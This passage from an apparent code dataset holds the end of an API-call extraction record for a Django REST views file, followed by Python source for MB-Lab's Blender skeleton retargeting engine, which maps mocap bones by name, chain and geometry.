'([IsAuthenticated])\n', (2104, 2123), False, 'from rest_framework.decorators import api_view, permission_classes\n'), ((3055, 3092), 'rest_framework.decorators.permission_classes', 'permission_classes', (['[IsAuthenticated]'], {}), '([IsAuthenticated])\n', (3073, 3092), False, 'from rest_framework.decorators import api_view, permission_classes\n'), ((3566, 3603), 'rest_framework.decorators.permission_classes', 'permission_classes', (['[IsAuthenticated]'], {}), '([IsAuthenticated])\n', (3584, 3603), False, 'from rest_framework.decorators import api_view, permission_classes\n'), ((4094, 4131), 'rest_framework.decorators.permission_classes', 'permission_classes', (['[IsAuthenticated]'], {}), '([IsAuthenticated])\n', (4112, 4131), False, 'from rest_framework.decorators import api_view, permission_classes\n'), ((4745, 4782), 'rest_framework.decorators.permission_classes', 'permission_classes', (['[IsAuthenticated]'], {}), '([IsAuthenticated])\n', (4763, 4782), False, 'from rest_framework.decorators import api_view, permission_classes\n'), ((5283, 5320), 'rest_framework.decorators.permission_classes', 'permission_classes', (['[IsAuthenticated]'], {}), '([IsAuthenticated])\n', (5301, 5320), False, 'from rest_framework.decorators import api_view, permission_classes\n'), ((5472, 5509), 'rest_framework.decorators.permission_classes', 'permission_classes', (['[IsAuthenticated]'], {}), '([IsAuthenticated])\n', (5490, 5509), False, 'from rest_framework.decorators import api_view, permission_classes\n'), ((2982, 3051), 'rest_framework.response.Response', 'Response', ([], {'status': 'status.HTTP_400_BAD_REQUEST', 'data': '"""wrong parameters"""'}), "(status=status.HTTP_400_BAD_REQUEST, data='wrong parameters')\n", (2990, 3051), False, 'from rest_framework.response import Response\n'), ((4716, 4741), 'rest_framework.response.Response', 'Response', (['serializer.data'], {}), '(serializer.data)\n', (4724, 4741), False, 'from rest_framework.response import Response\n'), ((2904, 2966), 'rest_framework.response.Response', 'Response', ([], {'status': 'status.HTTP_201_CREATED', 'data': 'serializer.data'}), '(status=status.HTTP_201_CREATED, data=serializer.data)\n', (2912, 2966), False, 'from rest_framework.response import Response\n'), ((1273, 1317), 'datetime.datetime.strptime', 'datetime.strptime', (['date', '"""%d.%m.%Y %H:%M:%S"""'], {}), "(date, '%d.%m.%Y %H:%M:%S')\n", (1290, 1317), False, 'from datetime import datetime\n'), ((1882, 1929), 'itertools.chain', 'chain', (['queryset', 'queryset_week1', 'queryset_week2'], {}), '(queryset, queryset_week1, queryset_week2)\n', (1887, 1929), False, 'from itertools import chain\n')]
|
# MB-Lab
#
# MB-Lab fork site: https://github.com/animate1978/MB-Lab
# Russian translation fork site: https://github.com/SergeyRom-23/MB-Lab-master-RU
#
# ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 3
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
#
# ManuelbastioniLAB - Copyright (C) 2015-2018 <NAME>
# Translation (C) 2019 <NAME> 23
import logging
import os
import json
import time
from functools import lru_cache
import mathutils
import bpy
from . import algorithms
from .utils import get_active_armature
logger = logging.getLogger(__name__)
class RetargetEngine:
def __init__(self):
self.has_data = False
self.femaleposes_exist = False
self.maleposes_exist = False
self.data_path = algorithms.get_data_path()
        self.maleposes_path = os.path.join(self.data_path, "poses", "male_poses")
        self.femaleposes_path = os.path.join(self.data_path, "poses", "female_poses")
if os.path.isdir(self.maleposes_path):
self.maleposes_exist = True
if os.path.isdir(self.femaleposes_path):
self.femaleposes_exist = True
self.body_name = ""
self.armature_name = ""
self.skeleton_mapped = {}
self.lib_filepath = algorithms.get_blendlibrary_path()
self.knowledge_path = os.path.join(self.data_path, "retarget_knowledge.json")
if os.path.isfile(self.lib_filepath) and os.path.isfile(self.knowledge_path):
self.knowledge_database = algorithms.load_json_data(self.knowledge_path, "Skeleton knowledge data")
self.local_rotation_bones = self.knowledge_database["local_rotation_bones"]
self.last_selected_bone_name = None
self.stored_animations = {}
self.correction_is_sync = True
self.is_animated_bone = ""
self.rot_type = ""
self.has_data = True
else:
logger.critical("Retarget database not found. Please check your Blender addons directory.")
@staticmethod
def get_selected_posebone():
        if bpy.context.selected_pose_bones:
            return bpy.context.selected_pose_bones[0]
return None
def is_editable_bone(self):
armat = get_active_armature()
if armat:
if armat.animation_data:
if armat.animation_data.action:
if self.rot_type in ["EULER", "QUATERNION"]:
self.is_animated_bone = "VALID_BONE"
else:
self.is_animated_bone = "The bone has not anim. data"
else:
self.is_animated_bone = "{0} has not action data".format(armat.name)
else:
self.is_animated_bone = "{0} has not animation data".format(armat.name)
else:
self.is_animated_bone = "No armature selected"
@staticmethod
def get_action(target_armature):
if target_armature and target_armature.animation_data:
return target_armature.animation_data.action
return None
def check_correction_sync(self):
scn = bpy.context.scene
selected_bone = self.get_selected_posebone()
if selected_bone:
if self.last_selected_bone_name != selected_bone.name:
self.get_bone_rot_type()
offsets = self.get_offset_values()
if scn.mblab_rot_offset_0 != offsets[0]:
self.correction_is_sync = False
if scn.mblab_rot_offset_1 != offsets[1]:
self.correction_is_sync = False
if scn.mblab_rot_offset_2 != offsets[2]:
self.correction_is_sync = False
self.is_editable_bone()
self.last_selected_bone_name = selected_bone.name
def get_offset_values(self):
offsets = [0, 0, 0]
for i in (0, 1, 2):
if self.rot_type == "QUATERNION":
channel = i+1
else:
channel = i
armat_name, animation_curve, animation_data_id = self.get_curve_data(channel)
if armat_name in self.stored_animations.keys():
if animation_data_id in self.stored_animations[armat_name].keys():
animation_data = self.stored_animations[armat_name][animation_data_id]
if animation_curve:
if animation_curve.keyframe_points:
offsets[i] = animation_curve.keyframe_points[0].co[1] - animation_data[0]
return offsets
def identify_curve_rot(self, bone):
r_type = "NO_CURVES"
armat = get_active_armature()
if armat:
action = self.get_action(armat)
if action and bone:
d_path1 = f'pose.bones["{bone.name}"].rotation_quaternion'
d_path2 = f'pose.bones["{bone.name}"].rotation_axis_angle'
d_path3 = f'pose.bones["{bone.name}"].rotation_euler'
animation_curve1 = action.fcurves.find(d_path1, index=0)
animation_curve2 = action.fcurves.find(d_path2, index=0)
animation_curve3 = action.fcurves.find(d_path3, index=0)
if animation_curve1:
r_type = "QUATERNION"
if animation_curve2:
r_type = "AXIS_ANGLE"
if animation_curve3:
r_type = "EULER"
return r_type
def get_bone_rot_type(self):
selected_bone = self.get_selected_posebone()
self.rot_type = self.identify_curve_rot(selected_bone)
def get_bone_curve_id(self, selected_bone):
if self.rot_type == "QUATERNION":
return f'pose.bones["{selected_bone.name}"].rotation_quaternion'
if self.rot_type == "EULER":
return f'pose.bones["{selected_bone.name}"].rotation_euler'
return None
def get_curve_data(self, channel):
armat = get_active_armature()
d_path = None
if armat:
action = self.get_action(armat)
if action:
selected_bone = self.get_selected_posebone()
if selected_bone:
d_path = self.get_bone_curve_id(selected_bone)
if d_path:
animation_curve = action.fcurves.find(d_path, index=channel)
animation_data_id = f'{d_path}{str(channel)}'
if animation_curve:
return (armat.name, animation_curve, animation_data_id)
return (None, None, None)
def reset_bones_correction(self):
self.stored_animations = {}
def correct_bone_angle(self, channel, value):
scn = bpy.context.scene
if self.rot_type == "QUATERNION":
channel += 1
armat_name, animation_curve, animation_data_id = self.get_curve_data(channel)
if armat_name and animation_curve and animation_data_id:
if armat_name not in self.stored_animations.keys():
self.stored_animations[armat_name] = {}
if animation_data_id not in self.stored_animations[armat_name].keys():
animation_data = []
for kpoint in animation_curve.keyframe_points:
animation_data.append(kpoint.co[1])
self.stored_animations[armat_name][animation_data_id] = animation_data
else:
animation_data = self.stored_animations[armat_name][animation_data_id]
for i, _ in enumerate(animation_data):
animation_curve.keyframe_points[i].co[1] = animation_data[i] + value
animation_curve.update()
scn.frame_set(scn.frame_current)
def align_bones_z_axis(self, target_armature, source_armature):
armature_z_axis = {}
if target_armature:
if source_armature:
logger.info("Aligning Z axis of %s with Z axis of %s",
target_armature.name, source_armature.name)
algorithms.select_and_change_mode(source_armature, 'EDIT')
for x_bone in target_armature.data.bones:
b_name = x_bone.name
source_bone_name = self.get_mapped_name(b_name)
if source_bone_name is not None:
armature_z_axis[b_name] = source_armature.data.edit_bones[source_bone_name].z_axis.copy()
else:
logger.debug("Bone %s non mapped", b_name)
algorithms.select_and_change_mode(source_armature, 'POSE')
algorithms.select_and_change_mode(target_armature, 'EDIT')
for armat_bone in target_armature.data.edit_bones:
if armat_bone.name in armature_z_axis:
z_axis = armature_z_axis[armat_bone.name]
armat_bone.align_roll(z_axis)
algorithms.select_and_change_mode(target_armature, 'POSE')
def reset_skeleton_mapped(self):
self.skeleton_mapped = {}
def init_skeleton_map(self, source_armat):
self.reset_skeleton_mapped()
self.already_mapped_bones = []
self.spine_bones_names = None
self.rarm_bones_names = None
self.larm_bones_names = None
self.rleg_bones_names = None
self.lleg_bones_names = None
self.head_bones_names = None
self.pelvis_bones_names = None
self.rtoe1_bones_names = None
self.rtoe2_bones_names = None
self.rtoe3_bones_names = None
self.rtoe4_bones_names = None
self.rtoe5_bones_names = None
self.ltoe1_bones_names = None
self.ltoe2_bones_names = None
self.ltoe3_bones_names = None
self.ltoe4_bones_names = None
self.ltoe5_bones_names = None
self.rfinger0_bones_names = None
self.rfinger1_bones_names = None
self.rfinger2_bones_names = None
self.rfinger3_bones_names = None
self.rfinger4_bones_names = None
self.lfinger0_bones_names = None
self.lfinger1_bones_names = None
self.lfinger2_bones_names = None
self.lfinger3_bones_names = None
self.lfinger4_bones_names = None
self.map_main_bones(source_armat)
@staticmethod
def name_combinations(bone_identifiers, side):
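        # For example, name_combinations(("hand",), 'RIGHT') yields
        # 'hand.r', 'r.hand', 'hand_r', 'r_hand', 'hand-r', 'r-hand',
        # 'handr', 'rhand', plus the same combinations built with 'right'.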
combinations = []
if side == 'RIGHT':
side_id = ("r", "right")
junctions = (".", "_", "-", "")
elif side == 'LEFT':
side_id = ("l", "left")
junctions = (".", "_", "-", "")
else:
side_id = [""]
junctions = [""]
for b_id in bone_identifiers:
for s_id in side_id:
for junct in junctions:
combinations.append(f'{b_id}{junct}{s_id}')
combinations.append(f'{s_id}{junct}{b_id}')
return combinations
def get_bone_by_exact_id(self, bones_to_scan, bone_identifiers, side):
if bones_to_scan:
name_combinations = self.name_combinations(bone_identifiers, side)
for b_name in bones_to_scan:
if b_name.lower() in name_combinations:
return b_name
return None
def get_bone_by_childr(self, armat, bones_to_scan, childr_identifiers):
if childr_identifiers:
for bone_name in bones_to_scan:
x_bone = self.get_bone(armat, bone_name)
if not x_bone:
return None
for ch_bone in x_bone.children:
for ch_id in childr_identifiers:
c1 = algorithms.is_string_in_string(ch_id, ch_bone.name)
c2 = ch_bone.name in bones_to_scan
c3 = algorithms.is_too_much_similar(x_bone.name, ch_bone.name)
if c1 and c2 and not c3:
return x_bone.name
return None
@staticmethod
def get_bones_by_index(bones_chain, index_data):
index = None
if bones_chain:
if len(index_data) == 1:
if index_data[0] == "LAST":
index = len(bones_chain)-1
else:
index = index_data[0]
if len(index_data) == 3:
if len(bones_chain) == index_data[0]:
index = index_data[1]
else:
index = index_data[2]
if index == "None":
index = None
if index is not None:
try:
return bones_chain[index]
except IndexError:
logger.warning("The chain %s of mocap file has less bones than the chain in MB-Lab", bones_chain)
return None
# def get_bones_by_parent(self, armat, bones_to_scan, parent_IDs):
# found_bones = set()
# for bone_name in bones_to_scan:
# parent_name = self.bone_parent_name(armat, bone_name)
# for pr_id in parent_IDs:
# if algorithms.is_string_in_string(pr_id, parent_name):
# found_bones.add(bone_name)
# return found_bones
@staticmethod
def get_bone_chains(armat, bone_names):
found_chains = []
for bone_name in bone_names:
bn = armat.data.bones[bone_name]
chain = [bone_name] + [b.name for b in bn.parent_recursive]
found_chains.append(chain)
return found_chains
@staticmethod
def get_all_bone_names(armat):
bone_names = []
for bn in armat.data.bones:
bone_names.append(bn.name)
return bone_names
@staticmethod
@lru_cache(maxsize=2)
def generate_bones_ids(side):
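        # Cached with lru_cache since the same two tuples are rebuilt for
        # every bone name tested; e.g. generate_bones_ids("RIGHT") returns
        # (['rforearm', 'relbow', ...], ['forearmr', 'elbowr', ...]).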
bone_ids = ("forearm", "elbow", "lowerarm", "hand", "wrist", "finger", "thumb", "index",
"ring", "pink", "thigh", "upperleg", "upper_leg", "leg", "knee", "shin", "calf",
"lowerleg", "lower_leg", "toe", "ball", "foot")
bn_pos = "r" if side == "RIGHT" else "l"
combo_bones_start = []
combo_bones_end = []
for b_id in bone_ids:
combo_bones_start.append(f'{bn_pos}{b_id}')
combo_bones_end.append(f'{b_id}{bn_pos}')
return combo_bones_start, combo_bones_end
def is_in_side(self, bone_names, side):
score_level = 0.0
if side == "RIGHT":
id_side2 = "right"
id_side3 = ("r.", "r_")
id_side4 = ("_r", ".r")
if side == "LEFT":
id_side2 = "left"
id_side3 = ("l.", "l_")
id_side4 = ("_l", ".l")
combo_bones_start, combo_bones_end = self.generate_bones_ids(side)
for bone_name in bone_names:
bone_name = bone_name.lower()
if len(bone_name) > 3:
c1 = bone_name[:2] in id_side3
c2 = bone_name[-2:] in id_side4
c3 = id_side2 in bone_name
c4 = algorithms.is_in_list(bone_names, combo_bones_start, "START")
c5 = algorithms.is_in_list(bone_names, combo_bones_end, "END")
if c1 or c2 or c3 or c4 or c5:
score_level += 1
if bone_names:
return score_level/len(bone_names)
return 0
@staticmethod
def order_with_list(bones_set, bones_list):
ordered_bones = []
for bone in bones_list:
if bone in bones_set:
ordered_bones.append(bone)
return ordered_bones
def chains_intersection(self, chains):
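        # Intersect all chains as sets, then restore the bone ordering of the
        # last chain; applied to e.g. both arms' parent chains this isolates
        # their shared trunk (the spine).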
chain_sets = []
chain_inters = None
result_chain = []
for chain in chains:
chain_sets.append(set(chain))
for i, chain in enumerate(chain_sets):
chain_inters = chain if chain_inters is None else chain_inters.intersection(chain)
result_chain = self.order_with_list(chain_inters, chains[i])
return result_chain
@staticmethod
def filter_chains_by_max_length(chains):
longer_chains = []
max_length = 0
for chain in chains:
max_length = max(max_length, len(chain))
for chain in chains:
if len(chain) == max_length:
longer_chains.append(chain)
return longer_chains
def chains_difference(self, chain_list, subchain_list):
subchain_set = set(subchain_list)
chain_set = set(chain_list)
d_chain = chain_set.difference(subchain_set)
return self.order_with_list(d_chain, chain_list)
def filter_chains_by_side(self, chains):
left_chains = []
right_chains = []
center_chains = []
for chain in chains:
score_left = self.is_in_side(chain, "LEFT")
score_right = self.is_in_side(chain, "RIGHT")
if score_left > 0:
left_chains.append(chain)
elif score_right > 0:
right_chains.append(chain)
else:
center_chains.append(chain)
if not center_chains:
score_threshold = 0
for chain in chains:
score_left = self.is_in_side(chain, "LEFT")
score_right = self.is_in_side(chain, "RIGHT")
score_center = 1.0-score_left-score_right
if score_center > score_threshold:
score_threshold = score_center
center_chain = chain
center_chains.append(center_chain)
return left_chains, center_chains, right_chains
@staticmethod
def filter_chains_by_tail(chains, chain_ids):
target_chains_lists = []
if chains:
for chain in chains:
chain_tail = chain[0]
if algorithms.is_in_list(chain_ids, [chain_tail]):
target_chains_lists.append(chain)
return target_chains_lists
@staticmethod
def clear_chain_by_dot_product(chain, armature):
algorithms.select_and_change_mode(armature, 'EDIT')
if len(chain) > 2:
edit_bones = algorithms.get_edit_bones(armature)
bone_name = chain[0]
if bone_name in edit_bones:
e_bone = edit_bones[bone_name]
if e_bone.parent:
v1 = e_bone.vector.normalized()
v2 = e_bone.parent.vector.normalized()
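                    # dot < 0.5 means the bone bends more than 60 degrees
                    # away from its parent, so it is treated as a misaligned
                    # branch and dropped from the chain.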
if v1.dot(v2) < 0.5:
logger.info("Retarget: Bone %s removed BY DOT", bone_name)
chain.remove(bone_name)
algorithms.select_and_change_mode(armature, 'POSE') # TODO: store the status and restore it
return chain
@staticmethod
def clear_chain_by_length(chain, armature):
algorithms.select_and_change_mode(armature, 'EDIT')
        edit_bones = algorithms.get_edit_bones(armature)
        for bone_name in chain[:]:  # iterate over a copy: items may be removed
if bone_name in edit_bones:
e_bone = edit_bones[bone_name]
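                # Bones shorter than 1/8 of their parent are assumed to be
                # end markers or helpers, not real chain links.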
if e_bone.parent:
if e_bone.length < e_bone.parent.length/8:
logger.info("Retarget: Bone %s removed BY LENGTH", bone_name)
chain.remove(bone_name)
algorithms.select_and_change_mode(armature, 'POSE') # TODO: store the status and restore it
return chain
def filter_chains_by_dotprod(self, armature):
self.spine_bones_names = self.clear_chain_by_dot_product(self.spine_bones_names, armature)
self.head_bones_names = self.clear_chain_by_dot_product(self.head_bones_names, armature)
self.rarm_bones_names = self.clear_chain_by_dot_product(self.rarm_bones_names, armature)
self.larm_bones_names = self.clear_chain_by_dot_product(self.larm_bones_names, armature)
self.pelvis_bones_names = self.clear_chain_by_dot_product(self.pelvis_bones_names, armature)
self.ltoe_and_leg_names = self.clear_chain_by_dot_product(self.ltoe_and_leg_names, armature)
self.rtoe_and_leg_names = self.clear_chain_by_dot_product(self.rtoe_and_leg_names, armature)
self.rfinger0_bones_names = self.clear_chain_by_dot_product(self.rfinger0_bones_names, armature)
self.rfinger1_bones_names = self.clear_chain_by_dot_product(self.rfinger1_bones_names, armature)
self.rfinger2_bones_names = self.clear_chain_by_dot_product(self.rfinger2_bones_names, armature)
self.rfinger3_bones_names = self.clear_chain_by_dot_product(self.rfinger3_bones_names, armature)
self.rfinger4_bones_names = self.clear_chain_by_dot_product(self.rfinger4_bones_names, armature)
self.lfinger0_bones_names = self.clear_chain_by_dot_product(self.lfinger0_bones_names, armature)
self.lfinger1_bones_names = self.clear_chain_by_dot_product(self.lfinger1_bones_names, armature)
self.lfinger2_bones_names = self.clear_chain_by_dot_product(self.lfinger2_bones_names, armature)
self.lfinger3_bones_names = self.clear_chain_by_dot_product(self.lfinger3_bones_names, armature)
self.lfinger4_bones_names = self.clear_chain_by_dot_product(self.lfinger4_bones_names, armature)
def filter_chains_by_length(self, armature):
self.head_bones_names = self.clear_chain_by_length(self.head_bones_names, armature)
self.rarm_bones_names = self.clear_chain_by_length(self.rarm_bones_names, armature)
self.larm_bones_names = self.clear_chain_by_length(self.larm_bones_names, armature)
self.rleg_bones_names = self.clear_chain_by_length(self.rleg_bones_names, armature)
self.lleg_bones_names = self.clear_chain_by_length(self.lleg_bones_names, armature)
self.ltoe_and_leg_names = self.clear_chain_by_length(self.ltoe_and_leg_names, armature)
self.rtoe_and_leg_names = self.clear_chain_by_length(self.rtoe_and_leg_names, armature)
self.rfinger0_bones_names = self.clear_chain_by_length(self.rfinger0_bones_names, armature)
self.rfinger1_bones_names = self.clear_chain_by_length(self.rfinger1_bones_names, armature)
self.rfinger2_bones_names = self.clear_chain_by_length(self.rfinger2_bones_names, armature)
self.rfinger3_bones_names = self.clear_chain_by_length(self.rfinger3_bones_names, armature)
self.rfinger4_bones_names = self.clear_chain_by_length(self.rfinger4_bones_names, armature)
self.lfinger0_bones_names = self.clear_chain_by_length(self.lfinger0_bones_names, armature)
self.lfinger1_bones_names = self.clear_chain_by_length(self.lfinger1_bones_names, armature)
self.lfinger2_bones_names = self.clear_chain_by_length(self.lfinger2_bones_names, armature)
self.lfinger3_bones_names = self.clear_chain_by_length(self.lfinger3_bones_names, armature)
self.lfinger4_bones_names = self.clear_chain_by_length(self.lfinger4_bones_names, armature)
@staticmethod
def filter_chains_by_id(chains, chain_ids):
target_chains_lists = []
for chain in chains:
if algorithms.is_in_list(chain_ids, chain):
target_chains_lists.append(chain)
return target_chains_lists
@staticmethod
def filter_chains_by_order(chains, n_ord):
named_fingers = ("thu", "ind", "mid", "ring", "pink")
identifiers = []
for chain in chains:
if chain:
identifiers.append(chain[0])
identifiers.sort()
result_chain = []
chain_order = None
chain_id = None
if algorithms.is_in_list(named_fingers, identifiers):
chain_order = "NAMED"
else:
chain_order = "NUMBERED"
if chain_order == "NAMED":
chain_id = named_fingers[n_ord]
if chain_order == "NUMBERED":
if len(identifiers) > n_ord:
chain_id = identifiers[n_ord]
if chain_id:
chain_id = chain_id.lower()
for chain in chains:
chain_tail = chain[0]
chain_tail = chain_tail.lower()
if chain_id in chain_tail:
result_chain = chain
return result_chain
return result_chain
def identify_bone_chains(self, chains):
left_chains, center_chains, right_chains = self.filter_chains_by_side(chains)
# ARM_CHAIN_IDS
arm_chain_ids = ("arm", "elbow", "hand", "wrist", "finger", "thumb", "index",
"ring", "pink", "mid")
arms_tail_chains = self.filter_chains_by_id(chains, arm_chain_ids)
arms_tail_chains = self.filter_chains_by_max_length(arms_tail_chains)
spine_chain = self.chains_intersection(arms_tail_chains)
right_arm_tail_chains = self.filter_chains_by_tail(right_chains, arm_chain_ids)
right_arm_tail_chains = self.filter_chains_by_max_length(right_arm_tail_chains)
r_arm_spine_chain = self.chains_intersection(right_arm_tail_chains)
right_arm_chain = self.chains_difference(r_arm_spine_chain, spine_chain)
left_arm_tail_chains = self.filter_chains_by_tail(left_chains, arm_chain_ids)
left_arm_tail_chains = self.filter_chains_by_max_length(left_arm_tail_chains)
l_arm_spine_chain = self.chains_intersection(left_arm_tail_chains)
left_arm_chain = self.chains_difference(l_arm_spine_chain, spine_chain)
# HEAD_CHAIN_IDS
head_chain_ids = ("head", "neck", "skull", "face", "spine")
head_tail_chains = self.filter_chains_by_id(center_chains, head_chain_ids)
head_tail_chains = self.filter_chains_by_max_length(head_tail_chains)
head_and_spine_chains = self.chains_intersection(head_tail_chains)
head_chain = self.chains_difference(head_and_spine_chains, spine_chain)
# FINGER_CHAIN_IDS
finger_chain_ids = ("finger", "thumb", "index", "ring", "pink", "mid")
# RIGHT
right_fingers_tail_chains = self.filter_chains_by_tail(right_chains, finger_chain_ids)
r_finger_arm_spine_chain = self.chains_intersection(right_fingers_tail_chains)
right_fingers_chain = [self.chains_difference(fingr, r_finger_arm_spine_chain)
for fingr in right_fingers_tail_chains]
# LEFT
left_fingers_tail_chains = self.filter_chains_by_tail(left_chains, finger_chain_ids)
l_finger_arm_spine_chain = self.chains_intersection(left_fingers_tail_chains)
left_fingers_chain = [self.chains_difference(fingr, l_finger_arm_spine_chain)
for fingr in left_fingers_tail_chains]
# FOOT_CHAIN_IDS
foot_chain_ids = ("foot", "ankle", "toe", "ball")
right_foot_tail_chains = self.filter_chains_by_tail(right_chains, foot_chain_ids)
right_foot_tail_chains.sort()
self.rtoe_and_leg_names = right_foot_tail_chains[0]
right_foot_tail_chains = self.filter_chains_by_max_length(right_foot_tail_chains)
r_leg_and_spine_chain = self.chains_intersection(right_foot_tail_chains)
right_leg_chain = self.chains_difference(r_leg_and_spine_chain, spine_chain)
right_toes_chain = [self.chains_difference(toe, r_leg_and_spine_chain) for toe in right_foot_tail_chains]
right_toes_chain = self.filter_chains_by_max_length(right_toes_chain)
left_foot_tail_chains = self.filter_chains_by_tail(left_chains, foot_chain_ids)
left_foot_tail_chains.sort()
self.ltoe_and_leg_names = left_foot_tail_chains[0]
left_foot_tail_chains = self.filter_chains_by_max_length(left_foot_tail_chains)
l_leg_and_spine_chain = self.chains_intersection(left_foot_tail_chains)
left_leg_chain = self.chains_difference(l_leg_and_spine_chain, spine_chain)
left_toes_chain = [self.chains_difference(toe, l_leg_and_spine_chain) for toe in left_foot_tail_chains]
left_toes_chain = self.filter_chains_by_max_length(left_toes_chain)
feet_tail_chains = self.filter_chains_by_tail(chains, foot_chain_ids)
# TODO not used
# leg_chain_IDs = ["thigh", "upperleg", "upper_leg", "leg", "knee", "shin",
# "calf", "lowerleg", "lower_leg", "foot", "ankle", "toe", "ball"]
pelvis_chain = self.chains_intersection(feet_tail_chains)
self.spine_bones_names = spine_chain
self.head_bones_names = head_chain
self.rarm_bones_names = right_arm_chain
self.larm_bones_names = left_arm_chain
self.rleg_bones_names = right_leg_chain
self.lleg_bones_names = left_leg_chain
self.pelvis_bones_names = pelvis_chain
self.rfinger0_bones_names = self.filter_chains_by_order(right_fingers_chain, 0)
self.rfinger1_bones_names = self.filter_chains_by_order(right_fingers_chain, 1)
self.rfinger2_bones_names = self.filter_chains_by_order(right_fingers_chain, 2)
self.rfinger3_bones_names = self.filter_chains_by_order(right_fingers_chain, 3)
self.rfinger4_bones_names = self.filter_chains_by_order(right_fingers_chain, 4)
self.lfinger0_bones_names = self.filter_chains_by_order(left_fingers_chain, 0)
self.lfinger1_bones_names = self.filter_chains_by_order(left_fingers_chain, 1)
self.lfinger2_bones_names = self.filter_chains_by_order(left_fingers_chain, 2)
self.lfinger3_bones_names = self.filter_chains_by_order(left_fingers_chain, 3)
self.lfinger4_bones_names = self.filter_chains_by_order(left_fingers_chain, 4)
@staticmethod
def get_ending_bones(armat):
found_bones = set()
for bn in armat.data.bones:
if not bn.children:
found_bones.add(bn.name)
return found_bones
@staticmethod
def string_similarity(main_string, identifiers, side):
m_string = main_string.lower()
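        # Strip the identifier and side markers from the name; the fewer
        # characters left over, the closer the match. 1000 is returned as a
        # "no match" score when no identifier appears in the name at all.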
sub_string_found = False
substrings = []
if side == 'LEFT':
substrings = ["l-", "-l", "_l", "l_", ".l", "l.", "left"]
if side == 'RIGHT':
substrings = ["r-", "-r", "_r", "r_", ".r", "r.", "right"]
for id_string in identifiers:
if id_string in m_string:
sub_string_found = True
if sub_string_found:
strings_to_subtract = identifiers + substrings
for s_string in strings_to_subtract:
s_string = s_string.lower()
if s_string in m_string:
m_string = m_string.replace(s_string, "")
return len(m_string)
return 1000
def get_bone_by_similar_id(self, bones_to_scan, bone_identifiers, side):
diff_length = 100
result = None
if bones_to_scan:
for bone_name in bones_to_scan:
score = self.string_similarity(bone_name, bone_identifiers, side)
if score < diff_length:
diff_length = score
result = bone_name
return result
def find_bone(self, armat, bone_type, search_method):
if not self.knowledge_database:
return None
bone_knowledge = self.knowledge_database[bone_type]
main_ids = bone_knowledge["main_IDs"]
children_ids = bone_knowledge["children_IDs"]
# parent_IDs = bone_knowledge["parent_IDs"]
side = bone_knowledge["side"]
chain_id = bone_knowledge["chain_ID"]
position_in_chain = bone_knowledge["position_in_chain"]
bones_chain = None
if chain_id == "spine_bones_names":
bones_chain = self.spine_bones_names
elif chain_id == "rarm_bones_names":
bones_chain = self.rarm_bones_names
elif chain_id == "larm_bones_names":
bones_chain = self.larm_bones_names
elif chain_id == "rleg_bones_names":
bones_chain = self.rleg_bones_names
elif chain_id == "lleg_bones_names":
bones_chain = self.lleg_bones_names
elif chain_id == "head_bones_names":
bones_chain = self.head_bones_names
elif chain_id == "pelvis_bones_names":
bones_chain = self.pelvis_bones_names
elif chain_id == "rtoe_and_leg_names":
bones_chain = self.rtoe_and_leg_names
elif chain_id == "ltoe_and_leg_names":
bones_chain = self.ltoe_and_leg_names
elif chain_id == "rfinger0_bones_names":
bones_chain = self.rfinger0_bones_names
elif chain_id == "rfinger1_bones_names":
bones_chain = self.rfinger1_bones_names
elif chain_id == "rfinger2_bones_names":
bones_chain = self.rfinger2_bones_names
elif chain_id == "rfinger3_bones_names":
bones_chain = self.rfinger3_bones_names
elif chain_id == "rfinger4_bones_names":
bones_chain = self.rfinger4_bones_names
elif chain_id == "lfinger0_bones_names":
bones_chain = self.lfinger0_bones_names
elif chain_id == "lfinger1_bones_names":
bones_chain = self.lfinger1_bones_names
elif chain_id == "lfinger2_bones_names":
bones_chain = self.lfinger2_bones_names
elif chain_id == "lfinger3_bones_names":
bones_chain = self.lfinger3_bones_names
elif chain_id == "lfinger4_bones_names":
bones_chain = self.lfinger4_bones_names
elif chain_id == "all_chains":
bones_chain = self.get_all_bone_names(armat)
if bones_chain:
all_methods = ["by_exact_name", "by_chain_index", "by_similar_name", "by_children"]
search_sequence = [search_method] # The first method is the one in knowledge
for methd in all_methods:
if methd not in search_sequence:
search_sequence.append(methd)
for s_method in search_sequence:
if s_method == "by_exact_name":
result = self.get_bone_by_exact_id(bones_chain, main_ids, side)
if result:
logger.info("Retarget: Bone %s found BY EXACT NAME", bone_type)
if result not in self.already_mapped_bones:
self.already_mapped_bones.append(result)
logger.info("Retarget: %s added to mapped bones", result)
return result
if s_method == "by_similar_name":
result = self.get_bone_by_similar_id(bones_chain, main_ids, side)
if result:
logger.info("Retarget: Bone %s found BY SIMILAR NAME", bone_type)
if result not in self.already_mapped_bones:
self.already_mapped_bones.append(result)
logger.info("Retarget: %s added to mapped bones", result)
return result
if s_method == "by_children":
result = self.get_bone_by_childr(armat, bones_chain, children_ids)
if result:
logger.info("Retarget: Bone %s found BY CHILDREN", bone_type)
if result not in self.already_mapped_bones:
self.already_mapped_bones.append(result)
logger.info("Retarget: %s added to mapped bones", result)
return result
if s_method == "by_chain_index":
result = self.get_bones_by_index(bones_chain, position_in_chain)
if result:
logger.info("Retarget: Bone %s found BY CHAIN INDEX", bone_type)
if result not in self.already_mapped_bones:
self.already_mapped_bones.append(result)
logger.info("Retarget: %s added to mapped bones", result)
return result
logger.warning("All retarget methods failed for %s.", bone_type)
        # logger.warning("No candidates found in: {0}, or the candidate found is already mapped to another bone".format(bones_chain))
return None
def bone_parent_name(self, armat, b_name):
x_bone = self.get_bone(armat, b_name)
if x_bone:
if x_bone.parent:
return x_bone.parent.name
return None
def get_bone(self, armat, b_name, b_type="TARGET"):
if armat:
if b_type == "TARGET":
if b_name:
if b_name in armat.pose.bones:
return armat.pose.bones[b_name]
if b_type == "SOURCE":
b_name = self.get_mapped_name(b_name)
if b_name:
if b_name in armat.pose.bones:
return armat.pose.bones[b_name]
return None
@staticmethod
    def get_target_editbone(armat, b_name):
if bpy.context.object.mode == "EDIT":
if b_name:
ebone = algorithms.get_edit_bone(armat, b_name)
if ebone:
return ebone
logger.warning("%s not found in edit mode of target armature %s", b_name, armat)
